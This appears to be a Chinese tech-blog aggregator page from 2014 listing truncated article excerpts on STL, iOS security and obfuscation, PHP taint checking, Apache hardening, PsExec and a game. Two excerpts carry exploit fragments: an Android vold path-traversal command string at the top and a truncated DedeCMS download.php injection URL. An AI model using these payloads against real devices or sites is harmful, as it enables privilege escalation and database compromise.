EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354983460 2000 1"/dev/socket/vold 分析中...一起研究分析
分类:
其他好文 时间:
2014-06-18 16:24:34
阅读次数:
298
图1、STL和c++标准模板库
作为C++标准不可缺少的一部分,STL应该是渗透在C++程序的角角落落里的。STL不是实验室里的宠儿,也不是程序员桌上的摆设,她的激动人心并非昙花一现。本教程旨在传播和普及STL的基础知识,若能借此机会为STL的推广做些力所能及的事情,到也是件让人愉快的事情。
1、
"什么是STL?",假如你对STL还知之甚少,那么我想,你一定很想知...
分类:
编程语言 时间:
2014-06-16 21:54:33
阅读次数:
298
在2013年7月13日前的版本。影响网站:所有dedecms版本漏洞页面plus/download.php漏洞脚本plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs..
分类:
其他好文 时间:
2014-06-16 17:50:04
阅读次数:
245
1.WWDC14 Session 409 学习笔记:
http://url.cn/Ju2Yt5
2..WWDC14 Session 4092学习笔记:
http://url.cn/Rx0mAN
3.iOS安全攻防(二十三):Objective-C代码混淆,念茜继续指引你的iOS安全之Ω路:
http://blog.csdn.net/yiyaaixuexi/article/details/...
分类:
移动开发 时间:
2014-06-16 11:16:42
阅读次数:
236
PHPTaint-检测xss/sqli/shell注入的php扩展模块web渗透者习惯采用黑盒或灰盒的方面来检测一款web应用是否存在漏洞,这种检测方法可以屏蔽不少漏洞,特别是程序逻辑中的漏洞。但如果能配合白盒的源码审计(也可以叫漏洞挖掘),效果将会更好,当然人力成本也会增加,其中,对于源码审计工作...
分类:
数据库 时间:
2014-06-11 08:46:40
阅读次数:
378
在上一篇文章中分析了物理攻击和护甲的攻防分析,但是忽略了英雄对战里面一个很重要的角色——技能攻击。实际上,除了少数后期英雄可以直接靠平砍(即物理攻击)杀人外,大部分英雄尤其是智力英雄还是要靠技能收割人头的。技能的使用也是评价一个玩家水平高低的主要指标。在本文中,我们就技能进行分析。...
分类:
其他好文 时间:
2014-06-11 06:08:32
阅读次数:
345
psExec是微软pstools工具包中最常用的一个工具,也是在内网渗透中的免杀渗透利器。
psExec能够在命令行下在对方没有开启telnet服务的时候返回一个半交互的命令行,像telnet客户端一样。非常方便我们的工作,之所以叫半交互是因为这个命令行不能够执行一条命令中有交互的回显,比如runas的密码输入。
使用方法如下:
PsExec v2.11 - Execute processe...
分类:
其他好文 时间:
2014-06-08 09:06:05
阅读次数:
336
apache的安全增强配置(使用mod_chroot,mod_security)
作者:windydays 2010/8/17 LAMP环境的一般入侵,大致经过sql注入,上传webshell,...
分类:
其他好文 时间:
2014-06-08 07:36:06
阅读次数:
236
iOS安全攻防(二十三):Objective-C代码混淆class-dump可以很方便的导出程序头文件,不仅让攻击者了解了程序结构方便逆向,还让着急赶进度时写出的欠完善的程序给同行留下笑柄。所以,我们迫切的希望混淆自己的代码。混淆的常规思路混淆分许多思路,比如:1)花代码花指令,即随意往程序中加入迷惑人的代码指令2)易读字符替换等等防止class-dump出可读信息的有效办法是易读字符替换。Obj...
分类:
移动开发 时间:
2014-06-08 03:27:02
阅读次数:
359
iOS安全攻防(二十四):敏感逻辑的保护方案(1)Objective-C代码容易被hook,暴露信息太赤裸裸,为了安全,改用C来写吧!当然不是全部代码都要C来写,我指的是敏感业务逻辑代码。本文就介绍一种低学习成本的,简易的,Objective-C逻辑代码重构为C代码的办法。也许,程序中存在一个类似这样的类:@interface XXUtil : NSObject
+ (BOOL)isVerifi...
分类:
移动开发 时间:
2014-06-08 03:13:24
阅读次数:
307
